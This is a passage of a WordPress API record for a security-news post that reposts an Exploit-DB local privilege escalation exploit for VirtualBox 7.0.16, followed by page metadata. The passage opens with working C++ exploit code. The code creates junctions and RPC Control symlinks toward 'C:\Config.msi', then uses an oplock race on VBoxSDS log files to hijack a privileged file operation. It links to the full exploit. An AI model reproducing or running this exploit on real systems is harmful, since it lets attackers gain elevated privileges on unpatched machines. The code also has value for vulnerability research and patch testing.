access, &#038;oa, &#038;io, NULL,<br \/>\n<br \/>FILE_ATTRIBUTE_NORMAL, share, dispostion, FILE_DIRECTORY_FILE |<br \/>\n<br \/>FILE_OPEN_REPARSE_POINT, NULL, NULL);<br \/>\n<br \/> if (!NT_SUCCESS(retcode)) {<br \/>\n<br \/>  return NULL;<br \/>\n<br \/> }<br \/>\n<br \/> return hDir;<br \/>\n<br \/>}<br \/>\n<br \/>LPWSTR BuildPath(LPCWSTR path) {<br \/>\n<br \/> wchar_t ntpath[MAX_PATH];<br \/>\n<br \/> swprintf(ntpath, L&#8221;\\\\??\\\\%s&#8221;, path);<br \/>\n<br \/> return ntpath;<br \/>\n<br \/>}<br \/>\n<br \/>void loadapis() {<br \/>\n<br \/> HMODULE ntdll = GetModuleHandle(L&#8221;ntdll.dll&#8221;);<br \/>\n<br \/> if (ntdll != NULL) {<br \/>\n<br \/>  pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll,<br \/>\n<br \/>&#8220;RtlInitUnicodeString&#8221;);<br \/>\n<br \/>  pNtCreateFile = (_NtCreateFile)GetProcAddress(ntdll, &#8220;NtCreateFile&#8221;);<br \/>\n<br \/>  pNtSetInformationFile = (_NtSetInformationFile)GetProcAddress(ntdll,<br \/>\n<br \/>&#8220;NtSetInformationFile&#8221;);<br \/>\n<br \/> }<br \/>\n<br \/> if (pRtlInitUnicodeString == NULL || pNtCreateFile == NULL) {<br \/>\n<br \/>  printf(&#8220;Cannot load api&#8217;s %d\\n&#8221;, GetLastError());<br \/>\n<br \/>  exit(0);<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>void cb0() {<br \/>\n<br \/> if (!Move(h)) {<br \/>\n<br \/>  printf(&#8220;reached3\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> printf(&#8220;reached2\\n&#8221;);<br \/>\n<br \/> _swprintf(dir, L&#8221;C:\\\\ProgramData\\\\VirtualBox&#8221;);<br \/>\n<br \/> if (!CreateJunction(BuildPath(dir), L&#8221;\\\\RPC Control&#8221;)) {<br \/>\n<br \/>  printf(&#8220;[!] Exiting!\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> WCHAR asdfasdf[MAX_PATH];<br \/>\n<br \/> _swprintf(asdfasdf, L&#8221;GLOBAL\\\\GLOBALROOT\\\\RPC Control\\\\%s&#8221;, filen);<br \/>\n<br \/> if (!DosDeviceSymLink(asdfasdf,<br \/>\n<br \/>L&#8221;\\\\??\\\\C:\\\\Config.msi::$INDEX_ALLOCATION&#8221;)) {<br \/>\n<br \/>  printf(&#8220;zxc\\n&#8221;);<br \/>\n<br \/>  \/\/printf(&#8220;[!] Exiting!\\n&#8221;);<br \/>\n<br \/>  \/\/exit(1);<br \/>\n<br \/> }<br \/>\n<br \/>}<br \/>\n<br \/>void cb1() {<br \/>\n<br \/> printf(&#8220;[!] oplock triggered\\n&#8221;);<br \/>\n<br \/> if (!Move(vb11)) {<br \/>\n<br \/>  printf(&#8220;reached3\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> if (!CreateDirectory(L&#8221;C:\\\\ProgramData\\\\VirtualBox\\\\VBoxSDS.log&#8221;, NULL)) {<br \/>\n<br \/>  printf(&#8220;Error creating dir. Exiting\\n&#8221;);<br \/>\n<br \/>  exit(1);<br \/>\n<br \/> }<br \/>\n<br \/> return;<br \/>\n<br \/>}<br \/>\n<br \/>BOOL Monitor(HANDLE hDir) {<br \/>\n<br \/> printf(&#8220;[!] Monitor called\\n&#8221;);<br \/>\n<br \/> BOOL deleted = FALSE;<br \/>\n<br \/> _swprintf(filen, L&#8221;VBoxSDS.log.11&#8243;);<br \/>\n<br \/> do {<br \/>\n<br \/>  do {<br \/>\n<br \/>   h = CreateFile(L&#8221;C:\\\\ProgramData\\\\VirtualBox\\\\VBoxSDS.log.11&#8243;, DELETE,<br \/>\n<br \/>FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,<br \/>\n<br \/>FILE_FLAG_OVERLAPPED, NULL);<br \/>\n<br \/>   printf(&#8220;h: %x\\n&#8221;, h);<br \/>\n<br \/>  } while (h == INVALID_HANDLE_VALUE);<br \/>\n<br \/>  oplock = FileOpLock::CreateLock(h, cb0);<br \/>\n<br \/>  if (oplock != NULL) {<br \/>\n<br \/>   HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS,<br \/>\n<br \/>(LPVOID)1, 0, NULL);<br \/>\n<br \/>   oplock->WaitForLock(INFINITE);<br \/>\n<br \/>   CloseHandle(c);<br \/>\n<br \/>  }<br \/>\n<br \/>  deleted = TRUE;<br \/>\n<br \/> } while (deleted == FALSE);<br \/>\n<br \/> return deleted;<br \/>\n<br \/>}\n<\/div>\n<p><a href=\"https:\/\/www.exploit-db.com\/exploits\/52287\" target=\"_blank\" style=\"display: inline-block;  color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;\">View Full Exploit Details<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exploit Details Basic Information Exploit Title VirtualBox 7.0.16 &#8211; Privilege Escalation Exploit ID EDB-ID:52287 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS Score 7.8&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-3803","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>VirtualBox 7.0.16 - Privilege Escalation - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=3803\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"VirtualBox 7.0.16 - Privilege Escalation - zero redgem\" \/>\n<meta property=\"og:description\" content=\"Exploit Details Basic Information Exploit Title VirtualBox 7.0.16 &#8211; Privilege Escalation Exploit ID EDB-ID:52287 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS Score 7.8...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=3803\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-05-09T14:43:12+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"10 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"VirtualBox 7.0.16 &#8211; Privilege Escalation\",\"datePublished\":\"2025-05-09T14:43:12+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803\"},\"wordCount\":1982,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.8\",\"exploit\",\"exploitdb\",\"HIGH\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3803#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803\",\"name\":\"VirtualBox 7.0.16 - Privilege Escalation - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-05-09T14:43:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=3803\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=3803#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"VirtualBox 7.0.16 &#8211; Privilege Escalation\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"VirtualBox 7.0.16 - Privilege Escalation - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=3803","og_locale":"en_US","og_type":"article","og_title":"VirtualBox 7.0.16 - Privilege Escalation - zero redgem","og_description":"Exploit Details Basic Information Exploit Title VirtualBox 7.0.16 &#8211; Privilege Escalation Exploit ID EDB-ID:52287 Type exploitdb Published 2025-05-09T00:00:00 Modified 2025-05-09T00:00:00 CVSS Information CVSS Score 7.8...","og_url":"https:\/\/zero.redgem.net\/?p=3803","og_site_name":"zero redgem","article_published_time":"2025-05-09T14:43:12+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"10 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=3803#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=3803"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"VirtualBox 7.0.16 &#8211; Privilege Escalation","datePublished":"2025-05-09T14:43:12+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=3803"},"wordCount":1982,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.8","exploit","exploitdb","HIGH","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=3803#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=3803","url":"https:\/\/zero.redgem.net\/?p=3803","name":"VirtualBox 7.0.16 - Privilege Escalation - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-05-09T14:43:12+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=3803#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=3803"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=3803#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"VirtualBox 7.0.16 &#8211; Privilege Escalation"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3803","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3803"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/3803\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3803"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3803"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3803"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}